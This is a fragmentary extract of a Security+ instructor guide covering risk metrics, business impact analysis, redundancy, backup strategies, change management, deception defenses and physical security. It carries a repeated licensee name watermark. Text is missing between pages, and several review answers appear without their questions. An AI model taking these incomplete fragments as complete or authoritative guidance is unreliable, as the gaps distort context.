504 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In the quantitative approach, the Return on Security Investment (ROSI) can be determined
by calculating a new ALE, based on the reduction in loss that will be created by the security
controls introduced. The formula for calculating ROSI is: [(ALE – ALEm) – Cost of Solution] /
Cost of Solution, where ALE is the ALE before controls and ALEm is after controls.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 505
the revenue and withdraw it from sale. Obviously this would generate considerable bad
feeling among existing customers. Avoidance is not often a credible option.
Transference (or sharing) means assigning risk to a third party, such as an insurance
company or a contract with a supplier that defines liabilities. For example, a company
could stop in-house maintenance of an e-commerce site and contract the services to
a third party, who would be liable for any fraud or data theft. Specific cybersecurity
insurance or cyberliability coverage protects against fines and liabilities arising from
data breaches and DoS attacks.
Note that in this sort of case it is relatively simple to transfer the obvious risks, but risks to
the company's reputation remain. If a customer's credit card details are stolen because
they used your unsecure e-commerce application, the customer won't care if you or a third
party were nominally responsible for security. It is also unlikely that legal liabilities could be
completely transferred in this way. For example, insurance terms are likely to require that
best practice risk controls have been implemented.
It is not possible to reduce risks to zero, so part of risk posture is concerned with Risk Acceptance and
managing what risks remain. Risk Appetite
Control Risk
Control risk is a measure of how much less effective a security control has become
over time. For example, antivirus became quite capable of detecting malware on the
basis of signatures, but then less effective as threat actors started to obfuscate code.
Control risk can also refer a security control that was never effective in mitigating
inherent risk. This illustrates the point that risk management is an ongoing process,
requiring continual reassessment and re-prioritization.
To ensure that the business stakeholders understand each risk scenario, you should Risk Awareness
articulate it such that the cause and effect can clearly be understood by the owner
of the asset. A DoS risk should be put into plain language that describes how the risk
would occur and, as a result, what access is being denied to whom, and the effect to
the business. For example: "As a result of malicious or hacking activity against the
public website, the site may become overloaded, preventing clients from accessing
their client order accounts. This will result in a loss of sales for so many hours and a
potential loss of revenue of so many dollars."
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
506 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 507
Review Activity:
Risk Management
Processes and Concepts
Answer the following questions:
You need to examine supply chain dependencies to identify how problems with one
or more suppliers would impact your business. You also need to examine customer
relationships to determine what liabilities you have in the event of an incident
impacting your ability to supply a product or service and what impact disruption
of important customer accounts would have, should cyber incidents disrupt their
business.
Single Loss Expectancy (SLE) or Annual Loss Expectancy (ALE). ALE is SLE multiplied by
ARO (Annual Rate of Occurrence).
The risk (as determined by impact and likelihood) compared to the cost of the control.
This metric can be calculated as Return on Security Investment (ROSI).
Risk transference.
Control risk arises when a security control is ineffective at mitigating the impact and/or
likelihood of the risk factor it was deployed to mitigate. The control might not work as
hoped, or it might become less effective over time.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
508 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 19B
Explain Business Impact
Analysis Concepts
The term continuity of operations planning (COOP) refers to the same sorts of activities
when undertaken by a government agency, rather than a business.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 509
to hours for critical functions, 24 hours for urgent functions, seven days for normal
functions, and so on. MTDs vary by company and event. Each function may be
supported by multiple systems and assets. The MTD sets the upper limit on the
amount of recovery time that system and asset owners have to resume operations.
For example, an organization specializing in medical equipment may be able to
exist without incoming manufacturing supplies for three months because it has
stockpiled a sizable inventory. After three months, the organization will not have
sufficient supplies and may not be able to manufacture additional products,
therefore leading to failure. In this case, the MTD is three months.
• Recovery time objective (RTO) is the period following a disaster that an individual
IT system may remain offline. This represents the amount of time it takes to identify
that there is a problem and then perform recovery (restore from backup or switch
in an alternative system, for instance).
• Work Recovery Time (WRT). Following systems recovery, there may be additional
work to reintegrate different systems, test overall functionality, and brief system
users on any changes or different working practices so that the business function is
again fully supported.
• Recovery Point Objective (RPO) is the amount of data loss that a system can
sustain, measured in time. That is, if a database is destroyed by a virus, an RPO of
24 hours means that the data can be recovered (from a backup copy) to a point not
more than 24 hours before the database was infected.
For example, a customer leads database might be able to sustain the loss of a few
hours' or days' worth of data (the salespeople will generally be able to remember
who they have contacted and rekey the data manually). Conversely, order processing
may be considered more critical, as any loss will represent lost orders and it may be
impossible to recapture web orders or other processes initiated only through the
computer system, such as linked records to accounting and fulfillment.
MTD and RPO help to determine which business functions are critical and also to
specify appropriate risk countermeasures. For example, if your RPO is measured in
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
510 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
days, then a simple tape backup system should suffice; if RPO is zero or measured in
minutes or seconds, a more expensive server cluster backup and redundancy solution
will be required.
• The calculation for MTBF is the total time divided by the number of failures. For
example, if you have 10 devices that run for 50 hours and two of them fail, the
MTBF is 250 hours/failure (10*50)/2.
• The calculation for MTTF for the same test is the total time divided by the
number of devices, so (10*50)/10, with the result being 50 hours/failure.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 511
• Mean time to repair (MTTR) is a measure of the time taken to correct a fault so
that the system is restored to full operation. This can also be described as mean
time to "replace" or "recover." This metric is important in determining the overall
recovery time objective (RTO).
NIST has published a guide to resiliency and IT contingency planning (SP800-34), available
at nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-34r1.pdf.
In terms of business continuity, a disaster is an event that could threaten mission Disasters
essential functions. For example, a privacy breach is a critical incident, but it is probably
not a direct threat to business functions. An earthquake that destroys a data center
is a disaster-level event. Disaster response involves many of the same principles and
procedures as incident response, but at a larger scale.
Person-Made
A person-made disaster event is one where human agency is the primary cause.
Typical examples other than devastating cybersecurity incidents include terrorism, war,
vandalism, pollution, and arson. There can also be accidental person-made disasters,
such as cutting through power or telecoms cabling.
Environmental
An environmental disaster, or natural disaster, is one that could not be prevented
through human agency. Environmental disasters include river or sea floods,
earthquakes, storms, disease, and so on. Natural disasters may be quite predictable
(as is the case with areas prone to flooding or storm damage) or unexpected, and
therefore difficult to plan for.
Most natural or environmental disasters can also have a human or artificial source. For
example, flooding might be more likely because dams are not adequately maintained; a
wildfire could be the result of arson or poorly maintained power infrastructure.
• Risk from disruption to utilities, such as electricity, water, and transportation. These
risks are higher in geographically isolated sites.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
512 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Who is responsible for doing what? How can they be contacted? What happens
if they are not available?
• Which functions are most critical? Where should effort first be concentrated?
• What resources are available? Should they be pre-purchased and held in stock?
Will the disaster affect availability of supplies?
3. Train staff in the disaster planning procedures and how to react well to change.
As well as restoring systems, the disaster recovery plan should identify stakeholders
who need to be informed about incidents with impacts to life and safety. There may
be a legal requirement to inform the police, fire service, or building inspectors about
any safety-related or criminal incidents. If third-party or personal data is lost or stolen,
the data subjects may need to be informed. If the disaster affects services, customers
need to be informed about the time-to-fix and any alternative arrangements that can
be made.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 513
Review Activity:
Business Impact Analysis Concepts
Answer the following questions:
2. True or false? RTO expresses the amount of time required to identify and
resolve a problem within a single system or asset.
True.
Mean time between failures (MTBF) represents the expected reliability of a product
over its lifetime.
Full-scale or functional exercises can identify mistakes in the plan that might not be
apparent when drafting procedures. It also helps to familiarize staff with the plan.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
514 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 19
Summary
Teaching You should be able explain risk management, business impact analysis, and disaster
Tip recovery planning processes and metrics.
Check that students
are confident about
the content that has
Guidelines for Risk Management
been covered. If there Follow these guidelines for supporting risk management assessment:
is time, revisit any
content examples that • Analyze workflows to determine MEFs and PBFs and the assets that support them,
they have questions using metrics such as MTTF/MTBF and MTTR.
about. If you have
used all the available • Identify threat and disaster scenarios, accounting for internal versus external,
time for this lesson
environmental, person-made, site-specific risk assessment, multiparty, software
block, note the issues,
and schedule time for licensing/compliance, IP theft, and legacy systems.
a review later in the
course. • Prioritizing MEFs, perform business impact analysis to determine inherent risk
likelihood and impacts for different threat and disaster scenarios, using metrics
such as SLE, ARO, and ALE.
• Define MTD, RTO, and RPO for each function and/or critical system and apply a risk
remediation technique (mitigation, transference, avoidance, or acceptance) that
meets these targets.
• Perform ongoing risk monitoring to determine residual risk and control risk.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 20
Implementing Cybersecurity Resilience
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
516 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 20A
Implement Redundancy Strategies
System availability can refer to an overall process, but also to availability at the level of a
server or individual component.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 517
Elasticity refers to the system's ability to handle these changes on demand in real
time. A system with high elasticity will not experience loss of service or performance if
demand suddenly increases rapidly.
All types of computer systems require a stable power supply to operate. Electrical Power Redundancy
events, such as voltage spikes or surges, can crash computers and network appliances,
while loss of power from brownouts or blackouts will cause equipment to fail. Power
management means deploying systems to ensure that equipment is protected against
these events and that network operations can either continue uninterrupted or be
recovered quickly.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
518 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Generators
A backup power generator can provide power to the whole building, often for several
days. Most generators use diesel, propane, or natural gas as a fuel source. With diesel
and propane, the main drawback is safe storage (diesel also has a shelf-life of between
18 months and two years); with natural gas, the issue is the reliability of the gas
supply in the event of a natural disaster. Data centers are also investing in renewable
power sources, such as solar, wind, geothermal, hydrogen fuel cells, and hydro. The
ability to use renewable power is a strong factor in determining the best site for new
data centers. Large-scale battery solutions, such as Tesla's Powerpack (tesla.com/
powerpack), may be able to provide an alternative to backup power generators. There
are also emerging technologies to use all the battery resources of a data center as a
microgrid for power storage (scientificamerican.com/article/how-big-batteries-at-data-
centers-could-replace-power-plants/).
A UPS is always required to protect against any interruption to computer services. A backup
generator cannot be brought online fast enough to respond to a power failure.
For the system to be fault tolerant, the higher bandwidth must not be critical to the function.
Multiple switching paths require use of Spanning Tree Protocol (STP) to prevent loops.
Load Balancers
NIC teaming provides load balancing at the adapter level. Load balancing and
clustering can also be provisioned at a service level:
• A load balancing switch distributes workloads between available servers.
• A load balancing cluster enables multiple redundant servers to share data and
session information to maintain a consistent service if there is failover from one
server to another.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 519
Disk and storage resources are critically dependent on redundancy. While backup provides Disk Redundancy
integrity for when a disk fails, to restore from backup would require installing a new
storage unit, restoring the data, and testing the system configuration. Disk redundancy
ensures that a server can continue to operate if one, or possibly more, storage devices fail.
RAID level 0 refers to striping without parity. Data is written in blocks across several disks
simultaneously, but with no redundancy. This can improve performance, but if one disk
fails, so does the whole volume, and data on it will be corrupted. There are some use cases
for RAID 0, but typically striping without parity is only implemented to improve performance
in a nested RAID solution.
Multipath
Where RAID provides redundancy for the storage devices, multipath is focused on
the bus between the server and the storage devices or RAID array. A storage system is
accessed via some type of controller. The controller might be connected to disk units
locally installed in a server, or it might connect to storage devices within a storage area
network (SAN). Multipath input/ouput (I/O) ensures that there is controller redundancy
and/or multiple network paths to the storage devices.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
520 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Geographical Dispersal
Geographical dispersal refers to data replicating hot and warm sites that are
physically distant from one another. This means that data is protected against a
natural disaster wiping out storage at one of the sites. This is also described as a geo-
redundant solution.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 521
Review Activity:
Redundancy Strategies
Answer the following questions:
The maximum tolerable downtime (MTD) metric expresses the availability requirement
for a particular business function.
An uninterruptible power supply (UPS) is required to provide failover for the initial
blackout event, before switching over to a standby generator to supply power over a
longer period.
Aside from RAID 0, RAID provides redundancy between a group of disks, so that if one
disk were to fail, that data may be recoverable from the other disks in the array.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
522 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 20B
Implement Backup Strategies
Show Slide(s)
Backups and Retention Policy
Every business continuity and disaster recovery plan makes use of backups, of one
Backups and type or another. The execution and frequency of backups must be carefully planned
Retention Policy and guided by policies. Data retention needs to be considered in the short and long
term:
• In the short term, files that change frequently might need retaining for version
control. Short-term retention is also important in recovering from malware
infection. Consider the scenario where a backup is made on Monday, a file is
infected with a virus on Tuesday, and when that file is backed up later on Tuesday,
the copy made on Monday is overwritten. This means that there is no good means
of restoring the uninfected version of the file. Short-term retention is determined by
how often the youngest media sets are overwritten.
• In the long term, data may need to be stored to meet legal requirements or to
comply with company policies or industry standards. Any data that must be retained
in a particular version past the oldest sets should be moved to archive storage.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 523
Performing a backup using Acronis Backup. (Screenshot used with permission from Acronis.)
For these reasons, backups are kept back to certain points in time. As backups take up
a lot of space, and there is never limitless storage capacity, this introduces the need for
storage management routines to reduce the amount of data occupying backup storage
media while giving adequate coverage of the required recovery window. The recovery
window is determined by the recovery point objective (RPO), which is determined
through business continuity planning. Advanced backup software can prevent media
sets from being overwritten in line with the specified retention policy.
Backing up a domain controller using Acronis backup—The How Long to Keep field specifies the
retention period. (Screenshot used with permission from Acronis.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
524 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Linux doesn't support a file archive attribute. Instead, a date stamp is used to determine
whether the file has changed.
Backup/Restore
Type Data Selection Archive Attribute
Time
Full All selected data High/low (one tape Cleared
regardless of when set)
it was previously
backed up
Incremental New files, as well as Low/high (multiple Cleared
files modified since tape sets)
the last backup
Differential All new and modi- Moderate/moderate Not Cleared
fied files since the (no more than two
last full backup sets)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 525
The factors that determine which method to use are the time it takes to restore versus
the time it takes to back up. Assuming a backup is performed every working day, an
incremental backup only includes files changed during that day, while a differential
backup includes all files changed since the last full backup. Incremental backups save
backup time but can be more time-consuming when the system must be restored. The
system must be restored from the last full backup set and then from each incremental
backup that has subsequently occurred. A differential backup system only involves two
tape sets when restoration is required.
Do not combine differential and incremental backups. Use full backups interspersed with
differential backups or full backups interspersed with incremental backups.
Copy Backups
Most software also has the capability to do copy backups. These are made outside the
tape rotation system and do not affect the archive attribute.
Snapshots are a means of getting around the problem of open files. If the data that Snapshots and Images
you're considering backing up is part of a database, such as SQL data or an Exchange
messaging system, then the data is probably being used all the time. Often copy-based
mechanisms will be unable to back up open files. Short of closing the files, and so too
the database, a copy-based system will not work. A snapshot is a point-in-time copy
of data maintained by the file system. A backup program can use the snapshot rather
than the live data to perform the backup. In Windows, snapshots are provided for on
NTFS volumes by the Volume Shadow Copy Service (VSS). They are also supported on
Sun's ZFS file system, and under some enterprise distributions of Linux.
Configuring VSS settings in Acronis Backup. (Screenshot used with permission from Acronis.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
526 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Virtual system managers can usually take snapshot or cloned copies of VMs. A
snapshot remains linked to the original VM, while a clone becomes a separate VM from
the point that the cloned image was made.
An image backup is made by duplicating an OS installation. This can be done either
from a physical hard disk or from a VM's virtual hard disk. Imaging allows the system
to be redeployed quickly, without having to reinstall third-party software, patches, and
configuration settings. A system image should generally not contain any user data files,
as these will quickly become out of date.
Teaching
Tip
These technologies Backup Media Types
should be familiar to
students from A+ and A backup operation can use several media types. Each type has advantages and
Network+. disadvantages that make it more or less suitable for given scenarios.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 527
Disk
Individual removable hard drives are an excellent low-cost option for SOHO network
backups, but they do not have sufficient capacity or flexibility to be used within an
automated enterprise backup solution.
Tape
Digital tape systems are a popular choice for institutions with multi-terabyte storage
requirements. Tape is very cost effective and, given a media rotation system, tapes can
be transported offsite. The latest generation of tape will store about 10-12 terabytes
per cartridge or up to about 30 TB with compression. The main drawback of tape is
that it is slow, compared to disk-based solutions, especially for restore operations.
If a site suffers an uncontrolled outage, in ideal circumstances processing will be Restoration Order
switched to an alternate site and the outage can be resolved without any service
interruption. If an alternate processing site is not available, then the main site must be Teaching
brought back online as quickly as possible to minimize service disruption. This does Tip
not mean that the process can be rushed, however. A complex facility such as a data British Airways' data
center or campus network must be reconstituted according to a carefully designed center problems
order of restoration. If systems are brought back online in an uncontrolled way, there make a good
is the serious risk of causing additional power problems or of causing problems in the example of why
order of restoration
network, OS, or application layers because dependencies between different appliances is a critical topic
and servers have not been met. (computerweekly.com/
news/450420405/
In very general terms, the order of restoration will be as follows:
The-British-Airways-
1. Enable and test power delivery systems (grid power, power distribution units IT-outage-What-
[PDUs], UPS, secondary generators, and so on). went-wrong-with-its-
datacentre).
2. Enable and test switch infrastructure, then routing appliances and systems.
4. Enable and test critical network servers (DHCP, DNS, NTP, and directory services).
5. Enable and test back-end and middleware (databases and business logic). Verify
data integrity.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
528 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Live boot media—another option is to use an instance that boots from read-only
storage to memory rather than being installed on a local read/write hard disk.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 529
Review Activity:
Backup Strategies
Answer the following questions:
1. What type of scheduled Windows backup job does not clear the archive
attribute?
A differential backup. This type of backup selects all new and modified data since the
previous full backup. You could also mention copy backups, though these are usually
ad hoc rather than scheduled.
The volume shadow copy service creates snapshots for the backup software to use,
avoiding problems with file locks and uncompleted database transactions.
True. As a security precaution, backup media can be taken offline at the completion of
a job to mitigate the risk of malware corrupting the backup.
4. You are advising a company about backup requirements for a few dozen
application servers hosting tens of terabytes of data. The company requires
online availability of short-term backups, plus offsite security media and
long-term archive storage. The company cannot use a cloud solution. What
type of on-premises storage solution is best suited to the requirement?
The offsite and archive requirements are best met by a tape solution, but the online
requirement may need a RAID array, depending on speed. The requirement is probably
not large enough to demand a storage area network (SAN), but could be provisioned as
part of one.
There may be unmet dependencies between systems that are started in the wrong
order. This could lead to boot failures and possibly data corruption.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
530 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 20C
Implement Cybersecurity
Resiliency Strategies
• A configuration management system (CMS) is the tools and databases that collect,
store, manage, update, and present information about CIs and their relationships.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 531
• Diagrams are the best way to capture the complex relationships between network
elements. Diagrams can be used to show how CIs are involved in business
workflows, logical (IP) and physical network topologies, and network rack layouts.
Remember, it is not sufficient simply to create the diagram, you must also keep the
diagram up to date.
An asset management process tracks all the organization's critical systems, Asset Management
components, devices, and other objects of value in an inventory. It also involves
collecting and analyzing information about these assets so that personnel can make Interaction
more informed changes or otherwise work with assets to achieve business goals. Opportunity
There are many software suites and associated hardware solutions available for If you do have some
extra time, ask
tracking and managing assets. An asset management database can be configured to students what naming
store as much or as little information as is deemed necessary, though typical data conventions they have
would be type, model, serial number, asset ID, location, user(s), value, and service encountered. Note
information. the past propensity
to use arbitrary, but
colorful, server names.
We are focusing on assets that require some degree of configuration (CIs). An organization
Some schemes code
will also have many assets with no configuration requirement, such as furniture.
location attributes,
but they are less
relevant to the cloud.
Functional names can
Asset Identification and Standard Naming Conventions be tricky if devices
subsequently change
Tangible assets can be identified using a barcode label or radio frequency ID (RFID) tag function. One school
attached to the device (or more simply, using an identification number). An RFID tag is of thought is that a
single convention that
a chip programmed with asset data. When in range of a scanner, the chip activates and tries to code multiple
signals the scanner. The scanner alerts management software to update the device's fields within a single
location. As well as asset tracking, this allows the management software to track the string that will remain
location of the device, making theft more difficult. consistent over time
is an impossible goal,
A standard naming convention for hardware assets, and for digital assets such as so the ID should
accounts and virtual machines, makes the environment more consistent. This means just be an arbitrary
that errors are easier to spot and that it is easier to automate through scripting. The string, colorful or not,
naming strategy should allow administrators to identify the type and function of any and devices located
and selected via
particular resource or location at any point in the CMDB or network directory. Each attributes and tags,
label should conform to rules for host and DNS names (support.microsoft.com/en-us/ possibly using CNAME
help/909264/naming-conventions-in-active-directory-for-computers-domains-sites- and TXT records
and). As well as an ID attribute, the location and function of tangible and digital assets (watson-wilson.ca/
can be recorded using attribute tags and fields or DNS CNAME and TXT resource blog/2011/03/03/host-
naming).
records.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
532 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Change Control
A change control process can be used to request and approve changes in a planned
and controlled way. Change requests are usually generated when something needs
to be corrected, when something changes, or when there is room for improvement in
a process or system currently in place. The need to change is often described either
as reactive, where the change is forced on the organization, or as proactive, where
the need for change is initiated internally. Changes can also be categorized according
to their potential impact and level of risk (major, significant, minor, or normal, for
instance). In a formal change management process, the need or reasons for change
and the procedure for implementing the change is captured in a request for change
(RFC) document and submitted for approval.
The RFC will then be considered at the appropriate level and affected stakeholders will
be notified. This might be a supervisor or department manager if the change is normal
or minor. Major or significant changes might be managed as a separate project and
require approval through a change advisory board (CAB).
Change Management
The implementation of changes should be carefully planned, with consideration for
how the change will affect dependent components. For most significant or major
changes, organizations should attempt to trial the change first. Every change should be
accompanied by a rollback (or remediation) plan, so that the change can be reversed
if it has harmful or unforeseen consequences. Changes should also be scheduled
sensitively if they are likely to cause system downtime or other negative impact on
the workflow of the business units that depend on the IT system being modified. Most
networks have a scheduled maintenance window period for authorized downtime.
When the change has been implemented, its impact should be assessed, and the
process reviewed and documented to identify any outcomes that could help future
change management projects.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 533
• A warm site could be similar, but with the requirement that the latest data set will
need to be loaded.
• A cold site takes longer to set up. A cold site may be an empty building with a lease
agreement in place to install whatever equipment is required when necessary.
Clearly, providing redundancy on this scale can be very expensive. Sites are often
leased from service providers. However, in the event of a nationwide emergency,
demand for the services is likely to exceed supply! Another option is for businesses to
enter into reciprocal arrangements to provide mutual support. This is cost effective but
complex to plan and set up.
Another issue is that creating a duplicate of anything doubles the complexity of
securing that resource properly. The same security procedures must apply to
redundant sites, spare systems, and backup data as apply to the main copy.
For many companies, the most cost-effective solution is to move processing and data
storage to the cloud.
Layered security is typically seen as improving cybersecurity resiliency because Diversity and Defense
it provides defense in depth. The idea is that to fully compromise a system, the in Depth
attacker must get past multiple security controls, providing control diversity. These
layers reduce the potential attack surface and make it much more likely that an attack
will be deterred or prevented, or at least detected and then prevented by manual
intervention.
• Endpoint security (technical control) on the laptop could scan the media for
malware or block access automatically.
• Security locks inserted into USB ports (physical control) on the laptop could prevent
attachment of media without requesting a key, allowing authorization checks to be
performed first.
• Permissions restricting Alan's user account (technical control) could prevent the
malware from executing successfully.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
534 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• The use of encrypted and digitally signed media (technical control) could prevent or
identify an attempt to tamper with it.
Vendor Diversity
As well as deploying multiple types of controls, you should consider the advantages
of leveraging vendor diversity. Vendor diversity means that security controls are
sourced from multiple suppliers. A single vendor solution is a tempting choice for many
organizations, as it provides interoperability and can reduce training and support costs.
Some disadvantages could include the following:
• Not obtaining best-in-class performance—one vendor might provide an effective
firewall solution, but the bundled malware scanning is found to be less effective.
• Less complex attack surface—a single vulnerability in a supplier's code could put
multiple appliances at risk in a single vendor solution. A threat actor will be able to
identify controls and possible weaknesses more easily.
Crypto Diversity
This concept can be extended to the selection of algorithms and implementations
of cryptography. Adoption of methods such as blockchain-based IAM (ibm.com/
blogs/blockchain/2018/10/decentralized-identity-an-alternative-to-password-based-
authentication) or selecting ChaCha in place of AES as a preferred cipher suite
(blog.cloudflare.com/it-takes-two-to-chacha-poly) forces threat actors to develop
new attack methods.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 535
software exploits, and spammers' abuse of open relay mail systems. These systems
are generally fully exposed to the Internet. On a production network, a honeypot is
more likely to be located in a DMZ, or on an isolated segment on the private network
(if the honeypot is seeking to draw out insider threats). This provides early warning
and evidence of whether an attacker has been able to penetrate to a given security
zone. This can help the security team find the source of the attack and take more
comprehensive steps to completely eradicate the threat from the organization.
A honeypot or honeynet can be combined with the concept of a honeyfile, which is
convincingly useful, but actually fake, data. This honeyfile can be made trackable, so
that when a threat actor successfully exfiltrates it, the attempts to resuse or exploit it
can be traced.
For example, an organization constructs a database full of benign or meaningless
data disguised as important financial records. This deception strategy might involve
breadcrumbs inserted into the production environment to subtly guide a threat actor
toward the spoofed "loot" (fidelissecurity.com/threatgeek/deception/breadcrumbs-
intelligent-deception). The database is placed behind a subnet with lowered defenses,
which baits an attacker into trying to exfiltrate this useless data. Identifying the attacker
also allows an organization to pursue an attribution strategy. Attribution means the
organization publicizes the attacker's role and publishes the methods used as threat
intelligence.
Disruption Strategies
Another type of active defense uses disruption strategies. These adopt some of the
obfuscation strategies used by malicious actors. The aim is to raise the attack cost and
tie up the adversary's resources. Some examples of disruption strategies include:
• Using bogus DNS entries to list multiple hosts that do not exist.
• Using port triggering or spoofing to return fake telemetry data when a host detects
port scanning activity. This will result in multiple ports being falsely reported as
open and will slow down the scan. Telemetry can refer to any type of measurement
or data returned by remote scanning. Similar fake telemetry could be used to report
IP addresses as up when they are not, for instance.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
536 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Cybersecurity Resiliency Strategies
Answer the following questions:
Configuration errors are more likely, especially where complex access control lists
(ACLs) and security monitoring sensor deployment is required.
A change control process governs the way changes are requested and approved. A
change management process governs the way that planned change is implemented
and the way unplanned change is handled.
Hot, warm, and cold sites, referring to the speed with which a site can failover.
Vendor diversity.
Fake telemetry means that when a threat actor runs port or host discovery scans, a
spoof response is returned. This could lead the threat actor to waste time probing the
port or host IP address trying to develop an attack vector that does not actually exist.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 537
Lesson 20
Summary
You should be able to use redundancy, backup, configuration/change management, Teaching
diversity, and deception to improve cybersecurity resilience. Tip
Check that students
Guidelines for Implementing Cybersecurity Resilience are confident about
the content that has
Follow these guidelines for implementing cybersecurity resilience: been covered. If there
is time, revisit any
• Set up a configuration management system and ensure that it is kept up to date: content examples that
they have questions
• An inventory to track assets, using standard naming convention and labelling. about. If you have
used all the available
• Baseline configuration information for each configuration item. time for this lesson
block, note the issues,
• Diagrams showing relationships between assets in workflows and networks. and schedule time for
a review later in the
• Ensure that changes to workflows and assets are governed by change control and course.
change management processes.
Interaction
• Develop a backup strategy and ensure that the order of restoration is fully tested: Opportunity
Optionally, ask
• Determine RPO and recovery windows for different data assets. students whether they
have witnessed any
• Separate data from compute functions to ensure nonpersistence during recovery. restore from backup
events that went
• Select media that meets storage and onsite/offsite plus online/offline storage either disastrously or
requirements (disk, tape, NAS, and SAN). very well.
• Using risk assessments, identify assets that have high-availability requirements and
provision redundancy to meet this requirement:
• Dual power supply, PDUs, PSUs, and generators to make power system resilient.
• NIC teaming, multiple paths, and load balancing to make networks resilient.
• Use risk assessments and impact analysis to identify whether technology, control,
vendor, or crypto diversity could be increased to benefit resiliency.
• Use threat awareness and risk assessment to determine whether deception and
active defense strategies, such as decoy/honeypot assets and fake telemetry, could
benefit resiliency.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 21
Explaining Physical Security
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
540 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 21A
Explain the Importance of Physical
Site Security Controls
• Accounting—keep a record of when entry/exit points are used and detect security
breaches.
Show Slide(s)
Physical security can be thought of in terms of zones. Each zone should be separated
Site Layout, Fencing, by its own barrier(s). Entry and exit points through the barriers need to be controlled
and Lighting by one or more security mechanisms. Progression through each zone should be
progressively more restricted.
Teaching
Tip
Make sure students
Site Layout, Fencing, and Lighting
are familiar with
the different
In existing premises, there will not be much scope to influence site layout. However,
